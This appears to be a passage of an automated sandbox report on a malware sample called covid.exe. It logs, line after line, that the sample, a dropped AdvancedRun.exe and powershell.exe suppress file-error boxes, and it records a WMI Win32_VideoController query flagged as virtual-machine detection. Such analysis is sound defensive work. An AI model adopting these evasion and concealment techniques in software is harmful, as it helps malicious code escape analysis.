Source: C:\Users\user\Desktop\covid.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\covid.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\covid.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
